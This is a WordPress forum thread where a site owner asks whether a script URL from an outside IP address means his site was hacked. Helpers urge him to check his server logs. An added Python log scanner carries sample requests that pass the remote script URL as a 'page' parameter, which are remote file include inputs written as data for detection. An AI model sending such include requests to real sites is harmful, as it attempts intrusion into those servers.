
Possible hacker intrusion on my site (29 posts)

  1. LwEEs
    Member
    Posted 6 years ago #

    I was getting some stats using http://www.octagate.com/service/SiteTimer/ when I noticed that one of the lines read http://218.5.77.71/beian.js
    Since then I've been trying to locate this .js. What is it? Does anyone know? Is my security compromised? I tried to google it and the only thing that comes up is some oriental sites. My site is http://www.lumencreativegroup.com; any help will be appreciated.

  2. whooami
    Member
    Posted 6 years ago #

    the javascript loads this page:

    http://211.152.51.87/beian.htm

    Speak Chinese? I don't.

    You haven't provided enough info for anyone to "help" you beyond that. In other words, if someone tried to use an include to load that, etc..

    so that's that, there you go.

  3. jessicakoh
    Member
    Posted 6 years ago #

    what version of wordpress are you using?

  4. jessicakoh
    Member
    Posted 6 years ago #

    I tried searching this "http://218.5.77.71/beian.js" in google. It is definitely dangerous.

    I think you may have to clean install your wordpress.

    You can safely back up your posts, pages and comments. Those are harmless.

    Once you get the xml backup file, search for "http://218.5.77.71/beian.js"

  5. LwEEs
    Member
    Posted 6 years ago #

    Jessica

    I'm using the latest 2.2.1. I was thinking of moving to PHP5; should I take this opportunity and do the move on a clean install?

    Whooami

    What else would you need to help?

  6. whooami
    Member
    Posted 6 years ago #

    MeneL001, BEFORE you start freaking out and taking advice from ppl, especially ppl that have NO post history, you need to determine WHY the link showed up in your stats.

    To do so, you need to NOT rely on some third party stats site, and instead, look at your server logs. If you have cpanel available they're accessible from there.

    It's possible, and very likely, that it was a simple attempt at an include attack -- and that's NOT necessarily something that requires you to reinstall, backup, yadda yadda yadda.

    In other words, calm down. Get your server logs, and if you need help figuring them out - send them to me @ whoo AT ( YOU NEED TO REMOVE THIS ) village-idiot.org

  7. Root
    Member
    Posted 6 years ago #

    Folk really should not turn up here out of left field proposing a reinstall and all sorts of frightening stuff when they haven't got a clue what they are doing. Good catch - whooami. :)

  8. LwEEs
    Member
    Posted 6 years ago #

    Thanks to all of you, I will check my logs now and report in about 2 hours.

    Thanks again.

    Luis

  9. whooami
    Member
    Posted 6 years ago #

    root,

    it amazes me :)

    http://www.google.com/search?hl=en&q=http%3A%2F%2F218.5.77.71%2Fbeian.js&btnG=Google+Search

    do YOU see anything there? I don't either, so how it's determined to be malicious via THAT google lookup is beyond me..

    Granted, IF it was an attempted include, that's not a good thing by any stretch of the imagination.

    And it may very well be malicious ..

    But.. really.

  10. mrmist
    Forum Janitor
    Posted 6 years ago #

    My guess is that that javascript is probably meant to be some kind of advert. After all, it is designed to open a new browser window, which itself links to a load of other places (none of which I could open at this time, just dead links.)

    Possibly malicious, but not particularly harmful in and of itself, unless there is more to it.

  11. IcelandDream
    Member
    Posted 6 years ago #

    Not malicious? If this same dope broke into your house and only stood in the foyer singing show tunes that would be ok? No sir, not invited so is malicious no matter what they appear to be doing.

  12. whooami
    Member
    Posted 6 years ago #

    IcelandDream,

    Get a little perspective. On the surface, neither the js OR the page it opens is malicious.

    Furthermore, we don't even know the context in which it showed up in this individual's logs. It may have simply been a referer, in which case, it's nothing more than spam.

    Your metaphor regarding someone breaking into your house is way off base, since so far, there is no evidence of any break in.

    Furthermore, NO-ONE said it was NOT malicious, until me just NOW - and it isn't. What's been recommended is looking at the Apache logs. The best advice was already given - so there's no sense in flaming an unneeded fire.
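
Added example, not part of any post in this thread: a Python script for the log check discussed above, separating requests that carry the reported URL in the request itself (an include attempt) from requests that only name it as the referer. It assumes Apache "combined" format logs; the sample lines, IP addresses and the `page` parameter name are constructed for illustration.

```python
import re
from urllib.parse import unquote

INDICATOR = "218.5.77.71/beian.js"  # the URL reported in the thread

# Apache "combined" access log format (assumed; adjust for other formats).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"'
)

def classify(line, indicator=INDICATOR):
    """Return (kind, status) for a log line that mentions the indicator, else None."""
    m = LINE_RE.match(line)
    if not m:
        # Do not silently drop lines we cannot parse but that mention the URL.
        return ("unparsed", None) if indicator in unquote(line) else None
    # Decode twice so single- and double-URL-encoded values both match.
    target = unquote(unquote(m["target"]))
    if indicator in target:
        # URL supplied inside the request: someone asked the site to load it.
        return ("include-attempt", int(m["status"]))
    if indicator in unquote(m["referer"]):
        # URL only claimed as the referring page: referer spam.
        return ("referer", int(m["status"]))
    return None

def scan(lines):
    """Return (line_number, kind, status) for every line mentioning the indicator."""
    hits = []
    for n, line in enumerate(lines, 1):
        result = classify(line)
        if result:
            hits.append((n, *result))
    return hits

# Constructed sample lines (documentation IP ranges, hypothetical parameter name).
SAMPLE = [
    '192.0.2.10 - - [10/Jul/2007:10:00:01 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Jul/2007:10:02:13 +0000] "GET /index.php?page=http://218.5.77.71/beian.js HTTP/1.1" 404 312 "-" "libwww-perl/5.805"',
    '198.51.100.7 - - [10/Jul/2007:10:02:15 +0000] "GET /?page=http%3A%2F%2F218.5.77.71%2Fbeian.js HTTP/1.1" 200 5120 "-" "libwww-perl/5.805"',
    '203.0.113.44 - - [10/Jul/2007:11:30:42 +0000] "GET / HTTP/1.1" 200 5120 "http://218.5.77.71/beian.js" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

A 200 status on an include-attempt line only means the server answered the request, not that the include worked; those lines are the ones that justify a closer look at the files on disk.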

  13. LwEEs
    Member
    Posted 6 years ago #

    Ok guys, where exactly do I find the logs?

  14. LwEEs
    Member
    Posted 6 years ago #

    My hosting company is GoDaddy.

  15. whooami
    Member
    Posted 6 years ago #

    MeneL001,

    Do you have cpanel available? I will give you instructions if you do.

  16. LwEEs
    Member
    Posted 6 years ago #

    Sorry, I don't know what cpanel is. Just let me know what to do.

  17. LwEEs
    Member
    Posted 6 years ago #

    Should I open mysql database?

  18. IcelandDream
    Member
    Posted 6 years ago #

    no thanks Who, I don't need examples. Have seen plenty.

    If it was me I would know if this code is expected or not and as such wouldn't be asking about being hacked if it was expected. Therefore it is malicious for the sake of the question being asked. No such thing as harmless code that is uninvited. No different than spam, does no harm but is anything but benign.

  19. LwEEs
    Member
    Posted 6 years ago #

    I'm in mysqladmin.

  20. whooami
    Member
    Posted 6 years ago #

    I have an "experiment" site on godaddy -- as far as I can tell they don't provide a simple way to download your server logs.

    I'm looking through my own "hosting control panel" right now for something that resembles what they talk about here:

    http://help.godaddy.com/article.php?article_id=2372&topic_id=388

  21. whooami
    Member
    Posted 6 years ago #

    NO MeneL001, you are NOT in the right place.

  22. LwEEs
    Member
    Posted 6 years ago #

    ok I'm waiting for instructions.

  23. whooami
    Member
    Posted 6 years ago #

    IcelandDream,

    That's a crock of crap -- especially given the little information that's been provided. As I ALREADY said -- it may very well have been a referer.

    You must get a LOT of malicious referers then, if you use your logic.

    "not expected"
    "uninvited"

    ---

    Now how about you just chill and let me help this person, and lay off the juice.

  24. LwEEs
    Member
    Posted 6 years ago #

    Man! I think GoDaddy actually charges for the logs, by purchasing Traffic Facts I would get access to those logs. That's not fair.

  25. whooami
    Member
    Posted 6 years ago #

    MeneL001,

    You may need to email godaddy to ask them how to access your logs. I've located the traffic facts link and mine is empty, and tells me to spend money. Additionally, I see NO "logs" link.

    aha! you noticed that too I see :P

  26. mrmist
    Forum Janitor
    Posted 6 years ago #

    Going back to the OP for a second, it said -

    "when I notice that one of the lines read "

    One of the lines in what? A line on your site or a line on the octagate timer site?

    If it's on the timer site and you don't trust it, then don't use that timer site.

    If it's on your site somewhere, then it's more bothersome, but it would be helpful to know *where* it appears.

  27. LwEEs
    Member
    Posted 6 years ago #

    It is actually on the octagate site, when it gives me the results of my pages loading time it includes with js that I don't know where it is coming from. What I don't have is any other wordpress install to see if it is something from all installs. I'm worried because I don't want to lose a year of work. I do backups with wp-db-backup but I don't know for how long it's been there.

    I will contact GoDaddy and report back.

    Thanks,

    Luis

  28. IcelandDream
    Member
    Posted 6 years ago #

    Whoami, wow. I'll stay away that's for damn sure. 'juice' that's funny and ironic. so bye

    Sorry Mene for not being able to help. But there are enough experts without me ever trying.

  29. whooami
    Member
    Posted 6 years ago #

    Btw, octagate is also showing this ..

    http://www.yceml.net/0240/10492144-1.jpg

    I've looked at your javascript. I've looked at your CSS. I've looked at your source code, both in my browser and through several source code viewers, and I see neither that nor that .js inside your pages.

    There's nothing that appears to be hidden, no urlencoded stuff, nothing.

    Now that I understand what you saw, you ought to be looking through your files. I am NOT suggesting that you freak out and reinstall.. just that you take a very close look at the content of your files, and that you start with your theme files.

Topic Closed

This topic has been closed to new replies.
